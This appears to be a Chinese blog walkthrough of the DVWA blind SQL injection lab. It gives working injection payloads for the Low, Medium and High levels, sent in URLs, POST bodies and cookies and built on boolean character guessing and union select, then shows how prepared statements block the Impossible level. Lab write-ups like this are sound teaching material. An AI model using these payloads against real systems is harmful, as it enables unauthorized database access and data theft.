【DVWA】【SQL Injection(Blind)】SQL盲註 Low Medium High Impossible
阿新 • • 發佈:2018-02-02
submit strong size users bsp amp select dmi mit
1.初級篇 Low.php
加單引號提交
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘&Submit=Submit#
輸出用戶id沒有找到
select first_name from users where user_id=1; #Success Return admin select first_name from users where user_id="1‘"; #Success Return admin select first_name from userswhere user_id=‘1‘‘; #Fail select first_name from users where user_id=(1‘); #Fail select first_name from users where user_id=((1‘)); #Fail
select first_name from users where user_id=((‘1‘‘)); #Fail
說明不是用雙引號閉合的,嘗試一下發現是單引號閉合
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘%23&Submit=Submit#
構造如下註入,若database名第一個字符為‘d‘,即ascii碼為100,頁面正常
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘ and ascii(substr(database(),1,1))=100%23&Submit=Submit#
反之頁面不正常
http://localhost/DVWA-master/vulnerabilities/sqli_blind/?id=1‘ and ascii(substr(database(),1,1))=99%23&Submit=Submit#
2.中級篇 Medium.php
POST 提交
id=0 union select 1,2#&Submit=Submit
仍然顯示存在,事實上id=0並不存在,但union select 返回了結果,程序只是單純的判斷結果集是否為空
和初級篇一樣,猜字符
id=1 and ascii(substr(database(),1,1))=100#&Submit=Submit
3.高級篇 High.php
和上一章不同,這次是寫入了cookie
http://localhost/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php
刷新
http://localhost/DVWA-master/vulnerabilities/sqli_blind/
使用EditThisCookie查看cookie
可以直接在這個頁面直接註入
0‘ union select 1,2#
刷新頁面
4.不可能篇 Impossible.php
查看源碼就知道使用PDO,無法註入
if(is_numeric( $id )) { // Check the database $data = $db->prepare( ‘SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;‘ ); $data->bindParam( ‘:id‘, $id, PDO::PARAM_INT ); $data->execute();
【DVWA】【SQL Injection(Blind)】SQL盲註 Low Medium High Impossible